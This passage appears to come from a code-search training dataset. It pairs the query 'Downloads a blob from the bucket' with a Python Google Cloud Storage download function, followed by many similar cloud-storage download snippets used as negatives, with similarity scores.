skip_header=skip_header)\n fnames = data[:, 0]\n fnames = np.asarray(fnames).astype(np.str)\n labels = data[:, 1]\n labels = np.asarray(labels).astype(np.str)\n # fnames_labels = dict(zip(img_pathes, img_labels))\n\n if one_hot:\n distinct_labels = set(labels)\n labels_name_int = dict([(b, a) for a, b in enumerate(distinct_labels)])\n\n labels_ = [labels_name_int[label] for label in labels]\n else:\n labels_ = labels\n labels_ = np.asarray(labels_).astype(np.int32)\n\n fnames_ = [os.path.join(root_dir, fname) for fname in fnames]\n fnames_ = np.asarray(fnames_).astype(np.str)\n\n # shuffle\n shuffle_indices = np.random.permutation(np.arange(len(fnames_)))\n fnames_ = fnames_[shuffle_indices]\n labels_ = labels_[shuffle_indices]\n\n print('len(fnames_): {}'.format(len(fnames_)))\n print('fnames_: {}'.format(fnames_[:2]))\n print('len(labels_): {}'.format(len(labels_)))\n print('labels_: {}'.format(labels_[:2]))\n\n return fnames_, labels_" ]
[ "0.75087816", "0.7491403", "0.7457117", "0.61335844", "0.6064078", "0.5983722", "0.58968204", "0.588334", "0.5836181", "0.58187306", "0.57689315", "0.57617164", "0.5745488", "0.5734802", "0.57158095", "0.5700895", "0.5700895", "0.5694585", "0.5681159", "0.5674216", "0.5672181", "0.5670955", "0.56547266", "0.5645852", "0.5645185", "0.5627844", "0.5605539", "0.5584917", "0.5563935", "0.55612254", "0.5560586", "0.5551291", "0.55314875", "0.5519803", "0.5501721", "0.5495654", "0.5487599", "0.5479452", "0.5478808", "0.544882", "0.54155535", "0.5411252", "0.54032046", "0.5383683", "0.5376828", "0.5376815", "0.53603804", "0.53603804", "0.5342561", "0.53366244", "0.5326256", "0.529444", "0.5246211", "0.5246146", "0.5242462", "0.52396864", "0.52243406", "0.5216948", "0.52068585", "0.5204655", "0.51940054", "0.51846254", "0.51721567", "0.51721567", "0.51583874", "0.51567787", "0.51408815", "0.5117793", "0.5115234", "0.5111146", "0.5107029", "0.5083099", "0.50670904", "0.5053478", "0.50481164", "0.5044185", "0.5035731", "0.50339967", "0.50305456", "0.5027591", "0.5025618", "0.50143623", "0.5014", "0.50080043", "0.5003119", "0.49983984", "0.49933285", "0.49891222", "0.49831602", "0.49769405", "0.4975253", "0.49693912", "0.4961359", "0.4959436", "0.49573514", "0.49558797", "0.49514002", "0.49462858", "0.49367687", "0.49335253", "0.49302417" ]
0.0
-1
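Several of the negatives in the record above parse a plain-text labels file into an index-to-name map. A minimal, self-contained sketch of that pattern (the optional "<index> <label>" two-column format is an assumption, mirroring the load_labels(path, encoding=...) variant collected above; the function name is hypothetical):

def load_label_map(path: str, encoding: str = "utf-8") -> dict:
    """Map integer indices to label names from a text file.

    Format assumed: one label per line, optionally prefixed by a numeric
    index separated by a single space.
    """
    with open(path, "r", encoding=encoding) as f:
        lines = [line.strip() for line in f if line.strip()]
    if lines and lines[0].split(" ", 1)[0].isdigit():
        pairs = (line.split(" ", 1) for line in lines)
        return {int(index): label.strip() for index, label in pairs}
    return {index: line for index, line in enumerate(lines)}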
Downloads a blob from the bucket.
def download_blob(bucket_name, source_blob_name, destination_file_name):
    storage_client = storage.Client()
    try:
        bucket = storage_client.get_bucket(bucket_name)
        blob = bucket.blob(source_blob_name)
        blob.download_to_filename(destination_file_name)
        print('Blob {} downloaded to {}.'.format(
            source_blob_name, destination_file_name))
    except:
        print("User does not have access to that bucket. Trying public link:")
        gcs_url = 'https://%(bucket)s.storage.googleapis.com/%(file)s' % {'bucket': bucket_name, 'file': source_blob_name}
        urllib.urlretrieve(gcs_url, destination_file_name)
        print("Download complete")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def download_blob(bucket_name, source_blob_name):\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n return blob", "def blob_download(blob_url):\n blob = storage.Object.from_url(blob_url)\n blobc = blob.download()\n return blobc", "def download_blob(bucket_name, source_blob_name):\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n return blob.download_as_string().decode()", "def download_blob(url: str) -> io.BytesIO:\n storage_client = storage.Client()\n bucket_name = get_bucket_name(url)\n source_blob_name = get_blob_name(url)\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n f = io.BytesIO(blob.download_as_bytes())\n return f", "def download_bucket(blob_name, path_to_file):\r\n blob = bucket.blob(blob_name)\r\n blob.download_to_filename(path_to_file)", "def download_specific_blob(bucket_name, path_to_storage_file_name, download_file_name):\r\n\r\n try:\r\n # initialize client & get blob\r\n _, _, blob = create_client(bucket_name, path_to_storage_file_name)\r\n\r\n # set the path to source file\r\n blob.download_to_filename(download_file_name)\r\n \r\n except Exception as err:\r\n raise err\r\n sys.exit(1)\r\n \r\n else:\r\n print(f\"download blob '{path_to_storage_file_name}' succeed\")\r\n\r\n return None", "def get_blob(self, download_meta):\n bucket_name, key = self._get_bucket_key(download_meta)\n response = self.s3.get_object(Bucket=bucket_name,\n Key=key)\n return response['Body'].read().decode()", "def downloadBlob(self, oid, serial):\n\n key = s3_blob_filename(oid, serial)\n\n # Confirm blob cache directory is locked for writes\n cache_filename = self.fshelper.getBlobFilename(oid, serial)\n lock_filename = os.path.join(os.path.dirname(cache_filename), '.lock')\n assert os.path.exists(lock_filename)\n\n # Download\n self.bucket.download_file(key, cache_filename)\n os.chmod(cache_filename, stat.S_IREAD)\n\n # Cache bookkeeping\n self._blob_data_bytes_loaded += os.path.getsize(cache_filename)\n self._check_blob_size(self._blob_data_bytes_loaded)", "def download_blob(bucket_name, source_blob_name, destination_file_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)\n\n print('Blob {} downloaded to {}.'.format(\n source_blob_name,\n destination_file_name))", "def get_blob(self, blob_name):\n return self.bucket.get_blob(blob_name)", "def download(self, bucket, object, filename=None):\n service = self.get_conn()\n downloaded_file_bytes = service \\\n .objects() \\\n .get_media(bucket=bucket, object=object) \\\n .execute()\n\n # Write the file to local file path, if requested.\n if filename:\n write_argument = 'wb' if isinstance(downloaded_file_bytes, bytes) else 'w'\n with open(filename, write_argument) as file_fd:\n file_fd.write(downloaded_file_bytes)\n\n return downloaded_file_bytes", "def download_blob(bucket_name, source_blob_name, destination_file_name):\n # bucket_name = \"your-bucket-name\"\n # source_blob_name = \"storage-object-name\"\n # destination_file_name = \"local/path/to/file\"\n\n bucket = storage_client.bucket(bucket_name)\n blobs = storage_client.list_blobs(bucket_name)\n for blob in blobs:\n print(blob.name)\n if (blob.name == source_blob_name):\n # Construct a client side representation of a blob.\n # Note `Bucket.blob` differs from 
`Bucket.get_blob` as it doesn't retrieve\n # any content from Google Cloud Storage. As we don't need additional data,\n # using `Bucket.blob` is preferred here.\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n \n print(\n \"Blob {} downloaded to {}.\".format(\n source_blob_name, destination_file_name\n )\n )", "def download_blob(bucket_name, source_blob_name, destination_file_name):\n # The ID of your GCS bucket\n # bucket_name = \"your-bucket-name\"\n\n # The ID of your GCS object\n # source_blob_name = \"storage-object-name\"\n\n # The path to which the file should be downloaded\n # destination_file_name = \"local/path/to/file\"\n\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n\n # Construct a client side representation of a blob.\n # Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve\n # any content from Google Cloud Storage. As we don't need additional data,\n # using `Bucket.blob` is preferred here.\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n\n print(\n \"Downloaded storage object {} from bucket {} to local file {}.\".format(\n source_blob_name, bucket_name, destination_file_name))", "def download_blob(source_blob_name, destination_file_name, bucket_name=\"bts-ml-data\"):\n # bucket_name = \"your-bucket-name\"\n # source_blob_name = \"storage-object-name\"\n # destination_file_name = \"local/path/to/file\"\n\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)\n\n print(\n \"Blob {} downloaded to {}.\".format(\n source_blob_name, destination_file_name\n )\n )", "def run(\n self,\n bucket: str = None,\n blob: str = None,\n project: str = None,\n chunk_size: int = None,\n credentials: dict = None,\n encryption_key: str = None,\n request_timeout: Union[float, Tuple[float, float]] = 60,\n ) -> str:\n # create client\n client = get_storage_client(project=project, credentials=credentials)\n\n # retrieve bucket\n bucket = self._retrieve_bucket(\n client=client, bucket=bucket, create_bucket=False\n )\n\n # identify blob name\n blob = self._get_blob(\n bucket,\n blob,\n chunk_size=chunk_size,\n encryption_key=encryption_key,\n )\n # Support GCS < 1.31\n return (\n blob.download_as_bytes(timeout=request_timeout)\n if hasattr(blob, \"download_as_bytes\")\n else blob.download_as_string(timeout=request_timeout)\n )", "def gcs_download_blob(bucket_name, source_blob_name, destination_file_name):\n storage_client = client #storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)", "def download(bucket, key):\n validate_bucket_name(bucket)\n validate_key_name(key)\n client = get_client()\n\n # do a buffered download\n bytes_io = io.BytesIO()\n client.download_fileobj(bucket, key, bytes_io)\n\n # hope that stuff is not too big, and just return content\n return bytes_io.getvalue()", "def get_blob(self, download_meta):\n blob_id = download_meta['blob_id']\n if isinstance(blob_id, str):\n blob_id = uuid.UUID(blob_id)\n session = self.DBSession()\n blob = session.get(Blob, blob_id) # was session.query(Blob).get(blob_id), rewritten for SA2.0\n return blob.data", "def _retrieve_blob(self, object_key):\n return self.s3_resource.Object(self.CVE_BUCKET, object_key).get()['Body'].read()", "def download(self, bucket_name, file_name, file_path):\n\n 
self.client.download_file(bucket_name, file_name, file_path)", "def loadS3Blob(self, oid, serial):\n\n # Check if it's already in the cache\n cache_filename = self.fshelper.getBlobFilename(oid, serial)\n if os.path.exists(cache_filename):\n return ZEO.ClientStorage._accessed(cache_filename)\n\n # If not, download from S3...\n # First, we'll create the directory for this oid, if it doesn't exist.\n self.fshelper.createPathForOID(oid)\n\n # OK, it's not here and we (or someone) needs to get it. We\n # want to avoid getting it multiple times. We want to avoid\n # getting it multiple times even accross separate client\n # processes on the same machine. We'll use file locking.\n\n lock = ZEO.ClientStorage._lock_blob(cache_filename)\n try:\n # We got the lock, so it's our job to download it. First,\n # we'll double check that someone didn't download it while we\n # were getting the lock:\n\n if os.path.exists(cache_filename):\n return ZEO.ClientStorage._accessed(cache_filename)\n\n # Actually download the blob. When this function\n # returns, it will have been sent. (The receiving will\n # have been handled by the asyncore thread.)\n self.downloadBlob(oid, serial)\n\n if os.path.exists(cache_filename):\n return ZEO.ClientStorage._accessed(cache_filename)\n\n raise ZODB.POSException.POSKeyError(\"No blob file\", oid, serial)\n finally:\n lock.close()", "def download_file(self, bucket_name, object_name, file_name):\n self._client.download_file(bucket_name, object_name, file_name)", "def download_blob(blob, file_group, destination, blob_service, progress_callback):\n\n def _wrap_callback(curr, total):\n if progress_callback:\n progress_callback(curr, total, destination)\n\n blob_service.get_blob_to_path(\n get_container_name(file_group), blob, destination,\n progress_callback=_wrap_callback)", "def __retrieve_from_bucket(fname):\n blob = BUCKET.blob(fname)\n json_data = json.loads(blob.download_as_string())\n return json_data", "def urlgrab(self, url, filename=None, **kwargs):\n blob_location = \"%s/%s\" % (self.base_path, url)\n self.verbose_logger.info(\"downloading gs://%s/%s to %s\" % (self.bucket.name, blob_location, filename))\n url = url.lstrip('/')\n if not filename:\n filename = url\n\n blob = storage.blob.Blob(name=blob_location,bucket = self.bucket)\n blob.download_to_filename(filename)\n return filename", "def get_raw(key: str, bucket: google.cloud.storage.bucket.Bucket) -> bytes:\n blob = google.cloud.storage.blob.Blob(name=key, bucket=bucket)\n return blob.download_as_string()", "def get_blob_url(self, download_meta):\n bucket_name, key = self._get_bucket_key(download_meta)\n location = self.s3.generate_presigned_url(\n ClientMethod='get_object',\n ExpiresIn=36*60*60,\n Params={'Bucket': bucket_name, 'Key': key})\n return location", "def _download_from_bucket(self, ext_filename, local_filename, force=False):\n if os.path.exists(local_filename) and not force:\n logging.info('File {} already exists. Not overwriting...'.format(local_filename))\n return\n if os.path.exists(local_filename) and force:\n logging.info('File {} already exists. Overwriting...'.format(local_filename))\n else:\n logging.info('File {} does not exist. 
Downloading...'.format(local_filename))\n\n Path(os.path.dirname(local_filename)).mkdir(parents=True, exist_ok=True)\n\n if self.s3:\n self.bucket.download_file(ext_filename, local_filename)\n logging.info('Downloaded {} to {}'.format(ext_filename, local_filename))\n if self.gs:\n try:\n client = storage.Client()\n bucket = client.get_bucket(self.bucket_name)\n blob = storage.Blob(ext_filename, bucket)\n blob.download_to_filename(local_filename)\n logging.info('Downloaded {} to {}'.format(ext_filename, local_filename))\n except:\n logging.warning('Downloading failed')\n\n i += 1", "def download_file(bucket_name: str, object_name: str, file_path: str):\n # pylint: disable=import-outside-toplevel\n from sotaque_brasileiro.utils import safe_getenv\n\n minio_client = Minio(\n safe_getenv(constants.MINIO_ENDPOINT.value),\n access_key=safe_getenv(constants.MINIO_ACCESS_KEY.value),\n secret_key=safe_getenv(constants.MINIO_SECRET_KEY.value),\n )\n minio_client.fget_object(bucket_name, object_name, file_path)", "def delete_blob(bucket_name, blob_name):\r\n\r\n # initialize client, get bucket, & get blob\r\n _, _, blob = create_client(bucket_name, blob_name)\r\n\r\n # delete blob\r\n blob.delete()\r\n\r\n print(\"blob {} deleted\".format(blob_name))", "def download_file(bucket, key, filename):\n validate_bucket_name(bucket)\n validate_key_name(key)\n client = get_client()\n\n client.download_file(bucket, key, filename)", "def get_image(filename):\n\n client.download_file(S3_BUCKET, filename, 'uploads/{}'.format(filename))", "def download_file(Bucket=None, Key=None, Filename=None, ExtraArgs=None, Callback=None, Config=None):\n pass", "def get(self, bucket: str, object_name: str) -> bytes:\n raise NotImplementedError()", "def OpenBlob(self, blob_key):\n return StringIO.StringIO(\n self._blobs[blobstore.BlobKey(unicode(blob_key))])", "def download_object(self, bucket, key, dest_path) -> None:\n self.resource.Bucket(bucket).download_file(key, dest_path)", "def get_file(self, file_name: str) -> BytesIO:\n fl = BytesIO()\n self.client.download_fileobj(self.bucket, file_name, fl)\n fl.seek(0)\n return fl", "def download_file(bucket,file_name):\n with open(file_name, 'wb') as f:\n s3.download_fileobj(bucket, file_name,f)\n print(file_name, \": is downloaded\")", "def fetch_and_extract(self, filename):\n # type: (Text) -> None\n\n blob = self.bucket.blob(filename)\n blob.download_to_filename(filename)\n\n with tarfile.open(filename, \"r:gz\") as tar:\n tar.extractall(self.data_dir)", "def download_from_blob():\n block_blob_service = BlockBlobService(account_name='project3twitter',\n account_key='<YOUR_ACCOUNT_KEY>')\n container_name = 'project3'\n block_blob_service.set_container_acl(container_name, public_access=PublicAccess.Container)\n\n # actual download\n block_blob_service.get_blob_to_path(container_name, 'word-count.txt', 'resource/word-count.txt')", "def delete_blob(bucket_name, blob_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(blob_name)\n\n blob.delete()\n\n print('Blob {} deleted.'.format(blob_name))", "def download_file_from_s3_public_bucket(bucket, object, output_file):\n botocore_config = Config(signature_version=UNSIGNED)\n s3_client = boto3.client(\"s3\", config=botocore_config)\n s3_client.download_file(bucket, object, output_file)", "def _download_file(bucket: str, key: str) -> str:\n tmp_file_name = f\"/tmp/logs\"\n\n try:\n with open(tmp_file_name, \"wb\") as data:\n s3cl.download_fileobj(bucket, key, data)\n except 
Exception as e:\n print(type(e).__name__, e)\n f = open(tmp_file_name, \"w\")\n f.write(\"\")\n f.close()\n try:\n with gzip.open(tmp_file_name, mode=\"rt\") as f:\n x = f.read()\n return x\n except Exception as e:\n print(type(e).__name__, e, key)\n return \"\"", "def loadBlob(self, oid, serial):\n start = time.time()\n try:\n blob_filename = self.storage.loadBlob(oid, serial)\n logger.debug('Fetched blob from ZEO in %ss' % (time.time() - start))\n except ZODB.POSException.POSKeyError:\n blob_filename = self.loadS3Blob(oid, serial)\n logger.debug('Fetched blob from S3 in %ss' % (time.time() - start))\n return blob_filename", "def s3_download(path):\n with s3_read(path):\n # Reading the file will cache the file locally.\n pass", "def download(self, bucket_name=None,\n object_key=None,\n dest=None):\n\n if bucket_name == None or \\\n object_key == None or \\\n dest == None:\n u_print(\" Error - argument is missing\")\n\n u_print_d('S3.download() - bucket=[{}] key=[{}] dest=[{}]'.format(bucket_name,\n object_key,\n dest))\n return self.s3.Object(bucket_name, object_key).download_file(dest)", "def get_bytes(bucket: str, key: str) -> bytes:\n logger.debug(f'Reading from s3://{bucket}/{key}')\n response = client().get_object(Bucket=bucket, Key=key)\n return response['Body'].read()", "def s3_get(url, temp_file):\n s3_resource = boto3.resource(\"s3\")\n bucket_name, s3_path = split_s3_path(url)\n s3_resource.Bucket(bucket_name).download_fileobj(s3_path, temp_file)", "def s3_get(url, temp_file):\n s3_resource = boto3.resource(\"s3\")\n bucket_name, s3_path = split_s3_path(url)\n s3_resource.Bucket(bucket_name).download_fileobj(s3_path, temp_file)", "async def fetch_file(self, download_url: str) -> bytes:\n log.debug(f\"Fetching file from branding repository: '{download_url}'.\")\n\n async with self.bot.http_session.get(download_url, params=PARAMS, headers=HEADERS) as response:\n if response.status != 200:\n raise RuntimeError(f\"Failed to fetch file due to status: {response.status}\")\n\n log.debug(\"Fetch successful, reading payload.\")\n return await response.read()", "def download(self, file_url):\n url = self.base_url + \"/storage-service/cloud-storage/s3/file/download?url={0}\".format(file_url)\n\n headers = {\"ApiKey\": self.api_key}\n response = requests.get(url=url, headers=headers)\n return response", "def get_blob(uuid, path=''):\n check_bundles_have_read_permission(local.model, request.user, [uuid])\n bundle = local.model.get_bundle(uuid)\n\n target_info = local.download_manager.get_target_info(uuid, path, 0)\n if target_info is None:\n abort(httplib.NOT_FOUND, 'Not found.')\n\n # Figure out the file name.\n if not path and bundle.metadata.name:\n filename = bundle.metadata.name\n else:\n filename = target_info['name']\n\n if target_info['type'] == 'directory':\n # Always tar and gzip directories.\n filename = filename + '.tar.gz'\n fileobj = local.download_manager.stream_tarred_gzipped_directory(uuid, path)\n elif target_info['type'] == 'file':\n if not zip_util.path_is_archive(filename) and request_accepts_gzip_encoding():\n # Let's gzip to save bandwidth. 
The browser will transparently decode\n # the file.\n filename = filename + '.gz'\n fileobj = local.download_manager.stream_file(uuid, path, gzipped=True)\n else:\n fileobj = local.download_manager.stream_file(uuid, path, gzipped=False)\n else:\n # Symlinks.\n abort(httplib.FORBIDDEN, 'Cannot download files of this type.')\n \n # Set headers.\n mimetype, _ = mimetypes.guess_type(filename, strict=False)\n response.set_header('Content-Type', mimetype or 'text/plain')\n if zip_util.get_archive_ext(filename) == '.gz' and request_accepts_gzip_encoding():\n filename = zip_util.strip_archive_ext(filename)\n response.set_header('Content-Encoding', 'gzip')\n else:\n response.set_header('Content-Encoding', 'identity')\n response.set_header('Content-Disposition', 'filename=\"%s\"' % filename)\n\n return fileobj", "def get_s3_object(bucket, key_name, local_file):\n\n tracer.put_metadata('object', f's3://{bucket}/{key_name}')\n\n try:\n s3_resource.Bucket(bucket).download_file(key_name, local_file)\n result = 'ok'\n tracer.put_annotation('OBJECT_DOWNLOAD', 'SUCCESS')\n except botocore.exceptions.ClientError as e:\n tracer.put_annotation('OBJECT_DOWNLOAD', 'FAILURE')\n if e.response['Error']['Code'] == '404':\n result = f'Error: s3://{bucket}/{key_name} does not exist'\n else:\n result = f'Error: {str(e)}'\n\n return(result)", "def _progress_blob(self, bucket, blob_name, progress_callback):\n return _ProgressBlob(\n name=blob_name,\n bucket=bucket,\n progress_callback=progress_callback\n )", "def download_from_s3(s3_resource, photo):\n try:\n bucket, key = photo.replace(\"s3://\", \"\").split(\"/\", 1)\n local_file = os.path.basename(photo)\n except ValueError as err:\n logger.exception(\"Couldn't get S3 info for %s: %s\", photo)\n raise\n\n try:\n logger.info(\"Downloading %s\", photo)\n s3_resource.Bucket(bucket).download_file(key, local_file)\n except ClientError:\n logger.exception(\"Couldn't download %s from S3.\", photo)\n raise\n\n return local_file", "def downloadObject(bucket:str, object:str, region:str, path:Path) -> None:\n client = boto3.client('s3', region_name=region)\n try:\n with open(str(path), 'wb') as data:\n client.download_fileobj(Bucket=bucket, Object=object, Data=data)\n except Exception as e:\n raise ObjectDownloadError(e)", "def DownloadFile(self, gcs_file_name, io_base):\n bucket, bucket_path = self._ParseBucketAndPath(gcs_file_name)\n\n # Check the size of the remote file. If it's empty, we have to return early\n # because the chunked downloader will crash. There aren't any contents to\n # retrieve in that case, anyway.\n object_data = self._RunWithRetries(\n self._service.objects().get(bucket=bucket, object=bucket_path).execute,\n self._CommonErrorMatcher)\n if ('name' not in object_data or object_data['name'] != bucket_path\n or 'size' not in object_data):\n raise CloudStorageApiError('Object data for %s is malformed.' 
%\n GcsPath(bucket, bucket_path))\n if int(object_data['size']) == 0:\n return\n\n request = self._service.objects().get_media(bucket=bucket,\n object=bucket_path)\n downloader = gapi_http.MediaIoBaseDownload(\n io_base, request, chunksize=1024*1024)\n done = False\n while not done:\n # The first return value indicates download progress, which we won't do\n # anything fancy with for now.\n _, done = self._RunWithRetries(downloader.next_chunk,\n self._CommonErrorMatcher)", "def generate_download_signed_url_v4(bucket_name, blob_name):\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(blob_name)\n\n url = blob.generate_signed_url(\n version=\"v4\",\n # This URL is valid for 15 minutes\n expiration=datetime.timedelta(minutes=30),\n # Allow GET requests using this URL.\n method=\"GET\",\n )\n\n return url", "def download_from_gcs(gcs_uri, target_path):\n bucket, blob_name = gcs_uri.replace('gs://', '').split('/', 1)\n client = storage.Client(project='embdatalab')\n bucket = client.get_bucket(bucket)\n prefix = blob_name.split('*')[0]\n unzipped = open(target_path, 'w')\n cmd = \"gunzip -c -f %s >> %s\"\n for blob in bucket.list_blobs(prefix=prefix):\n with tempfile.NamedTemporaryFile(mode='rb+') as f:\n logger.info(\"Downloading %s to %s\" % (blob.path, f.name))\n blob.chunk_size = 2 ** 30\n blob.download_to_file(f)\n f.flush()\n f.seek(0)\n subprocess.check_call(\n cmd % (f.name, unzipped.name), shell=True)\n return unzipped.name", "def download_file(cls, uri, fobj):\n # Breaks the URI into usable componenents.\n values = get_values_from_media_uri(uri)\n\n conn = cls._get_aws_s3_connection(values['username'],\n values['password'])\n bucket = conn.get_bucket(values['host'])\n key = bucket.get_key(values['path'])\n\n logger.debug(\"S3Backend.download_file(): \" \\\n \"Downloading: %s\" % uri)\n\n try:\n key.get_contents_to_file(fobj)\n except AttributeError:\n # Raised by ResumableDownloadHandler in boto when the given S3\n # key can't be found.\n message = \"The specified input file cannot be found.\"\n raise InfileNotFoundException(message)\n\n logger.debug(\"S3Backend.download_file(): \" \\\n \"Download of %s completed.\" % uri)\n return fobj", "def get_s3_object(self, remote_s3_url):\n try:\n _file = tempfile.mkstemp()[1]\n parsed_s3_path = remote_s3_url.split(\"/\", 3) # s3://bucket-name/key\n remote_bucket = parsed_s3_path[2] # Bucket name\n remote_key = parsed_s3_path[3] # Key\n self.download_file(remote_bucket, remote_key, _file)\n return _file\n except Exception as e:\n message = {'FILE': __file__.split('/')[-1],\n 'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}\n self.logger.exception(message)\n raise", "def do_part_download(args):\r\n bucket_name, key_name, fname, min_byte, max_byte, split, secure, max_tries, current_tries = args\r\n conn = boto.connect_s3(calling_format=OrdinaryCallingFormat())\r\n conn.is_secure = secure\r\n\r\n # Make the S3 request\r\n resp = conn.make_request(\"GET\", bucket=bucket_name,\r\n key=key_name, headers={'Range':\"bytes=%d-%d\" % (min_byte, max_byte)})\r\n\r\n # Open the target file, seek to byte offset\r\n fd = os.open(fname, os.O_WRONLY)\r\n logger.debug(\"Opening file descriptor %d, seeking to %d\" % (fd, min_byte))\r\n os.lseek(fd, min_byte, os.SEEK_SET)\r\n\r\n chunk_size = min((max_byte-min_byte), split*1024*1024)\r\n logger.debug(\"Reading HTTP stream in %dM chunks\" % (chunk_size/1024./1024))\r\n t1 = time.time()\r\n s = 0\r\n try:\r\n while True:\r\n data = resp.read(chunk_size)\r\n if data == \"\":\r\n break\r\n 
os.write(fd, data)\r\n s += len(data)\r\n t2 = time.time() - t1\r\n os.close(fd)\r\n s = s / 1024 / 1024.\r\n logger.debug(\"Downloaded %0.2fM in %0.2fs at %0.2fMBps\" % (s, t2, s/t2))\r\n except Exception, err:\r\n logger.debug(\"Retry request %d of max %d times\" % (current_tries, max_tries))\r\n if (current_tries > max_tries):\r\n logger.error(err)\r\n else:\r\n time.sleep(3)\r\n current_tries += 1\r\n do_part_download(bucket_name, key_name, fname, min_byte, max_byte, split, secure, max_tries, current_tries)", "def download(\n bucket: str, key: str, file_path: str, session: Optional[boto3.Session] = None\n) -> str:\n s3_client = _get_client(session)\n\n LOGGER.info(\"downloading s3://%s/%s to %s...\", bucket, key, file_path)\n s3_client.download_file(Bucket=bucket, Key=key, Filename=file_path)\n return file_path", "def download_fileobj(Fileobj=None, Bucket=None, Key=None, ExtraArgs=None, Callback=None, Config=None):\n pass", "def get(self, key):\n key = str(urllib.unquote(key)).strip()\n logging.debug('key is %s', key)\n blob_info = blobstore.BlobInfo.get(key)\n self.send_blob(blob_info)", "def load(self, bucket, key):\n\n bucket = self._build_bucket_resource(bucket)\n\n with io.BytesIO() as stream:\n bucket.download_fileobj(key, stream)\n stream.seek(0)\n\n wrapper = io.TextIOWrapper(stream, encoding='utf-8')\n # Preserve the original order\n return json.load(wrapper, object_pairs_hook=collections.OrderedDict)", "def _s3_get_file(url):\n try:\n return S3().get_contents_from_url(url)\n except Exception as e:\n raise ScrBaseException(\"Could not load file from {0}: {1}\".format(url, e))", "def s3_get(url, temp_file, proxies=None):\n\ts3_resource = boto3.resource (\"s3\", config=Config (proxies=proxies))\n\tbucket_name, s3_path = split_s3_path (url)\n\ts3_resource.Bucket (bucket_name).download_fileobj (s3_path, temp_file)", "def list_blobs(bucket_name):\n # bucket_name = \"your-bucket-name\"\n\n storage_client = storage.Client()\n print(storage_client.current_batch)\n # Note: Client.list_blobs requires at least package version 1.17.0.\n blobs = storage_client.list_blobs(bucket_name)\n\n # print(len([1 for blob in blobs]))\n for blob in blobs:\n print(blob.name)", "def get_blob_content(container_name: str, blob_path: str) -> str:\n global BLOB_SERVICE_CLIENT\n # TODO: Should add retry policy here\n if not BLOB_SERVICE_CLIENT:\n logging.info(\n f\"{HEADER} Initialize blob service client for {DATABRICKS_OUTPUT_STORAGE_ACCOUNT_URL}\")\n BLOB_SERVICE_CLIENT = BlobServiceClient(DATABRICKS_OUTPUT_STORAGE_ACCOUNT_URL,\n credential=DATABRICKS_OUTPUT_STORAGE_SAS_TOKEN)\n blob_client = BLOB_SERVICE_CLIENT.get_blob_client(container=container_name, blob=blob_path)\n content = blob_client.download_blob().content_as_text()\n return content", "def load_pickle(self, bucket, key):\n\n with BytesIO() as obj_buffer:\n self._s3.Bucket(bucket).download_fileobj(key, obj_buffer)\n obj_buffer.seek(0)\n obj = pickle.load(obj_buffer)\n\n return obj", "def copy_blob(bucket_name, blob_name, destination_bucket_name, destination_blob_name):\r\n\r\n # initialize client, get bucket, & get blob\r\n storage_client, source_bucket, source_blob = create_client(bucket_name, blob_name)\r\n\r\n # set destination bucket name\r\n destination_bucket = storage_client.bucket(destination_bucket_name)\r\n\r\n # copy blob\r\n blob_copy = source_bucket.copy_blob(\r\n source_blob, destination_bucket, destination_blob_name\r\n )\r\n\r\n print(\r\n \"blob {} in bucket {} copied to blob {} in bucket {}.\".format(\r\n source_blob.name,\r\n 
source_bucket.name,\r\n blob_copy.name,\r\n destination_bucket.name,\r\n )\r\n )", "def get_file(object_name: str, **kwargs) -> HTTPResponse:\n data = client.get_object(DATASETS_BUCKET, object_name, **kwargs)\n return data", "def get_object(self, bucket_name, key, stream=False, extra_get_args={}):\n url = self.__key_url(bucket_name, key)\n res = self.infinispan_client.get(url, headers=self.headers, auth=self.basicAuth)\n data = res.content\n return data", "async def read(self, size=-1):\n # read the object using the bucket and path already determined in\n # __init__, and using the connection object\n try:\n # get the file size first\n file_size = await self._getsize()\n if size== -1:\n range_start = 0\n range_end = file_size\n range_size = file_size\n else:\n range_start = self._seek_pos\n range_end = self._seek_pos+size-1\n if range_end > file_size:\n range_end = file_size-1\n range_size = range_end-range_start+1\n\n # if multipart download is not supported\n if not self._multipart_download:\n # get the full file\n s3_object = await self._conn_obj.conn.get_object(\n Bucket = self._bucket,\n Key = self._path,\n )\n body = s3_object['Body']\n data = await body.read()\n # if the file is smaller than the MAXIMUM_PART_SIZE\n elif (range_size < self._part_size):\n # the requested range is the full file, it is fastest to\n # not specify the range\n if (range_start == 0 and range_size == file_size):\n # get the full file\n s3_object = await self._conn_obj.conn.get_object(\n Bucket = self._bucket,\n Key = self._path,\n )\n # a portion of the file is requested\n else:\n s3_object = await self._conn_obj.conn.get_object(\n Bucket = self._bucket,\n Key = self._path,\n Range = 'bytes={}-{}'.format(\n range_start, range_end\n )\n )\n body = s3_object['Body']\n data = await body.read()\n # multipart download version\n else:\n \"\"\"Use range get to split up a file into the MAXIMUM_PART_SIZE\n and download each part asynchronously.\"\"\"\n # calculate the number of necessary parts\n n_parts = int(range_size / self._part_size + 1)\n # don't go above the maximum number downloadable\n if n_parts > self._max_parts:\n n_parts = self._max_parts\n # (re)calculate the download size\n part_size = float(range_size) / n_parts\n # create the tasks and assign the return data buffer\n tasks = []\n data_buf = io.BytesIO()\n\n for p in range(0, n_parts):\n event_loop = asyncio.get_event_loop()\n task = event_loop.create_task(self._read_partial_file(\n p, part_size\n ))\n tasks.append(task)\n # wait for all the tasks to 